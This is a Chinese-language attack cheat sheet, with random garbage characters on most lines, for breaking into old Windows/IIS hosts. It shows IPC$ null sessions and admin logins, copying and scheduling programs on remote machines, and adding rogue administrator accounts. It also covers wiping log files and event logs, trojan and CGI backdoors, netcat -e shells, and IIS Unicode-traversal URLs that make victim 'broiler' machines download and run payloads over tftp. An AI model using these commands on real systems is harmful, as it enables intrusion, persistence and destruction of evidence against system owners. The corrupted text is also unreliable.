网管和黑客都必须知道的命令
6*�A
�S4l 常用的几条NET命令:
c�}U&!R2p{ Y�� '�Yo�c (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
�C8��m8ys }e�9E+2}Z\ (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
51*o&�:eim ([qw#!;w;� (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
�&s_[~g�<� Hf�FP4#C,� (查看远程主机时间) net time \\IP地址
>Yl?i&�3�n ��'%. lY9D (定时启动某个程序) at \\IP地址 02:18 readme.exe
�b*�n�o.eB gLaF�IeF<+ (查看共享) net view \\IP地址
l-Xxur5M' XTG*56IzL (查看netbios工作组列表) nbtstat -A IP地址
pa~.�[cBI qq]ZkT} �� (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
JY(_�}A�Au �-|~6Zf�"� (这两条把自己增加到管理员组): net user 用户名 密码 /add
�D�Dw��H9* 4l�@*x^�F� net localgroup Administrators 用户名 /add
?}D@�{%O3T ��)�Jz� L (断开连接) net use \\IP地址\ipc$ /delete
�m;>H�U�Tj Z�L:noh��B 扫尾:
_bHmc���K� :��tu6'X\k del C:\winnt\system32\logfiles\*.*
63#Sf$p{v� &�y[Od�{�= del C:\winnt\ssytem32\config\*.evt
j��="{�^b c����*�'�D del C:\winnt\system32\dtclog\*.*
qSl�C@@.>� [>A��%�%�� del C:\winnt\system32\*.log
6#MI���t:# �!_QE|tVeR del C:\winnt\system32\*.txt
lM3UjR��|@ n-�be8p�)- del C:\winnt\*.txt
�bJ*jJl� x GPy+�\�P�` del C:\winnt\*.log
2ro4{^�(�_ �1mz��;4xb 一、netsvc.exe
�JQ�P7>W�� ?\L@Pr|=Dr 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
��fil'.�_ P��n\ L�g8 netsvc /list \\IP地址
P�sij�*%I4 �h\Ck�"�"& netsvc schedule \\IP地址 /query
p~Fc�*g[�! ;�?"]S/16, netsvc \\IP地址 schedule /start
ycg5�S rg �3fgV�vt-2 二、OpenTelnet.exe
h2#���G��� 4yW9}�=N! 远程启动主机的Telnet服务,并绑定端口到7878,例如:
�h.g��j4/g `P��X�SQf� OpenTelnet \\IP地址 用户名 密码 1 7878
f���}PT�3� n�g(STvSh: 然后就可以telnet到主机的7878端口,进入DOS方式下:
.S>:�-�j'u Ai��fnC��4 telnet IP地址 7878
I'{-T=R-q� \Bg;}\8�X 三、winshell.exe
��IGeXj%�e �f7c%Z:C#Y 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
.�uG�|Vq1v 494"-F��6� p Path (查看winshell主程序的路径信息)
7�E*d>:5I ujG�vrY�j� b reBoot (重新启动机器)
`rzg��C� \ :@a8>i�1�& d shutDown (关闭机器)
�GD<xmu�o� �&��k*sxW' s Shell (执行后你就会看到可爱的“C:\>”)
PE4#d��x�^ :8cp]v�dW� x eXit (退出本次登录会话,此命令并不终止winshell的运行)
\R#]�}g0! ��bnt�>j0E CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
y=_8ae}aD~ �Q%o:*(x[O 四、3389登陆器,GUI方式登录远程主机的
*�~�~�� >? ��u �)�c�c 五、elsave.exe
o(Y��j[:+m T$�RV�z
� 事件日志清除工具
���}ac��0} O>9��+��tQ elsave -s \\IP地址 -l "application" -C
�3e+� Ih�2 4�8l!P(>?y elsave -s \\IP地址 -l "system" -C
} �Q�VRE�j G9J+D?'�hH elsave -s \\IP地址 -l "security" -C
|B�yw]\�3v Rw�J#G7S#� 执行后成功清除应用程序日志,系统日志,安全日志
�uH�7���$/ \�ws<��W�7 六、hbulot.exe
z�RSIJ!A�~ %��g1:y�x� 开启win2kserver和winxp的3389服务
't�'~p#$,F D|�lp3\`%� hbulot [/r]
>_�bH�,/D' 3@P�
2]Q~D 使用/r表示安装完成后自动重起目标使设置生效。
kXK D>."E* qT7E�"|.$� 七、nc.exe(netcat.exe)
[(Ss^?�AJW W�'WZ@�!!� 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
�.G8+D%%�. ANh7`AU�uO 想要连接到某处: nc [-options] hostname port[s] [ports] ...
wPdp!h7B~N [9dW9[�Z+! 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
,�$��BbJQ5 h8�OmO�5/H 参数:
qP=4D
9 �] J�%]�<�/J� -e prog 程序重定向,一旦连接,就执行 [危险!!]
L6S!?t.{Yv vDl�6TKXcu -g gateway source-routing hop point[s], up to 8
_P9T�h#UAg ����,U':=8 -G num source-routing pointer: 4, 8, 12, ...
�3~�v'��Ev S�xo9y0K8- -h 帮助信息
o�Rm�z'�F� y�^�p�z�qv -i secs 延时的间隔
y
qDE|DIez �`(NMHXgG+ -l 监听模式,用于入站连接
Kg��h@.Ir� =w��&JD�j� -n 指定数字的IP地址,不能用hostname
J;"66�ue(d �vZ3/t8$*� -o file 记录16进制的传输
y�U'��Fyul >W��v�b!8N -p port 本地端口号
���9�1B�l{ $K�D��H"J� -r 任意指定本地及远程端口
e
lj�]��e ^PHWUb�+`` -s addr 本地源地址
�>~C*m �`# [AgS@^"sf5 -u UDP模式
���6�bj.z GddP)l{uCF -v 详细输出——用两个-v可得到更详细的内容
�g�Yb}<[O! kex4U6&OQB -w secs timeout的时间
:rr;�9nMR[ )"�S�P >2} -z 将输入输出关掉——用于扫描时
V}�d��e|�= 八、TFTPD32.EXE
��5>{��� cZ>h��[XX[ 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
�,��.X�qb~ kayb�i �0 http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
|oCE�7'BaP -U��D^O*�U 然后可以直接令文件运行:
��}?^V9K- �UOh��%�"h http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
�m^�hi}Am1 �a�LzRbRv 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
�8&����T6� 9[#�9�c�v 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
#�{�97<sU\ �N�pu�#.)G 一、一 Xscan命令行运行参数说明:
nSUQ Eh�o< 5~ho1�Ud�� 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
zl~��`�>�� 6R_�G{AWLL 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
d�k}T&qZ~p g�?Jx99�c; xscan -file <主机列表文件名> <检测项目> [其他选项]
/*,hR��>UG :mOHR&2xR% 其中<检测项目> 含义如下:
G �.�PzpBA M�Blh�lMyI -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
M�E'hN->�c G�Z�t+�(�q -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
\jlem�<&� E�"8cB]`|8 -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
ey4�RKk,� %p��?��+r� -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
)q��xZ�HV� i n�}��N[ -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
Q#+y}�pOLP _�;� 7�{1n [其他选项] 含义如下:
Ih�_2")d�� ib$_x�:OO" -v: 显示详细扫描进度
~cHpA;x9<^ ;fg8,(S�M^ -p: 跳过Ping不通的主机
8#?�j�YhT7 ���BT[jD}? -o: 跳过没有检测到开放端口的主机
<~wr�;�"�S 5��!�GL��" -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
